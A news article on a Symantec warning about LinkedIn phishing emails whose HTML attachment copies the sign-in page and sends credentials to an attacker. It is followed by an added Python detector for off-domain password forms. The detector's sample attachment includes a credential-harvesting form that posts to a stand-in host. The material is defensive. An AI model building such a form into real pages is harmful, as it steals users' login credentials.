BENGALURU: Internet security firm Symantec on Monday warned users of professional networking site LinkedIn to beware of emails which claim to be from the support team of the website.
In an advisory, Symantec said this is a phishing email designed to trick the user into sending their credentials to the attacker. The email claims that there has been irregular activity on the user’s account and recommends a ‘security update’ for the account. The user is then asked to download an attached form in HTML format and follow the instructions there.
“The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipients use this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” the advisory said.
In the email being sent out, the word LinkedIn is spelt with a lowercase ‘l’ instead of a capital ‘L’, which can fool some email filters into allowing the mail into the users’ inbox. “The most important technique here is the HTML attachment. This method bypasses browser blacklists that often flag suspicious websites to prevent users from being phished,” Symantec said.
A simple way to avoid falling prey to the scam is to use two-step verification, which helps control access to accounts through passwords sent to mobile phones, the advisory said.
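Because the attachment opens from local disk, a URL blacklist has nothing to check, but a mail gateway or analyst can still inspect where its sign-in form submits. The sketch below is an added example, not code from Symantec or the article: it flags any form in an HTML attachment that holds a password field and posts to a host outside the expected brand domain. The domain set, the sample markup and the host `collector.example` are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: domains the genuine sign-in form would post to.
EXPECTED_DOMAINS = {"linkedin.com"}

class FormAudit(HTMLParser):
    """Record each <form>'s action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def host_is_expected(host, expected=EXPECTED_DOMAINS):
    # Exact match or true subdomain only, so "linkedin.com.evil.example" fails.
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in expected)

def suspicious_forms(html, expected=EXPECTED_DOMAINS):
    """Return off-brand hosts that password-bearing forms would post to.
    Relative actions carry no hostname and are skipped."""
    parser = FormAudit()
    parser.feed(html)
    hits = []
    for form in parser.forms:
        host = urlparse(form["action"].strip()).hostname
        if form["has_password"] and host and not host_is_expected(host, expected):
            hits.append(host)
    return hits

# Constructed sample attachment, not taken from the real campaign.
SAMPLE_ATTACHMENT = """
<form method="POST" action="https://collector.example/post.php">
  <input type="text" name="email"><input type="PASSWORD" name="pass"/>
</form>
<form action="https://www.linkedin.com/search"><input name="q"></form>
"""
```

Running `suspicious_forms(SAMPLE_ATTACHMENT)` reports only the first form, since the second has no password field and posts to the expected domain.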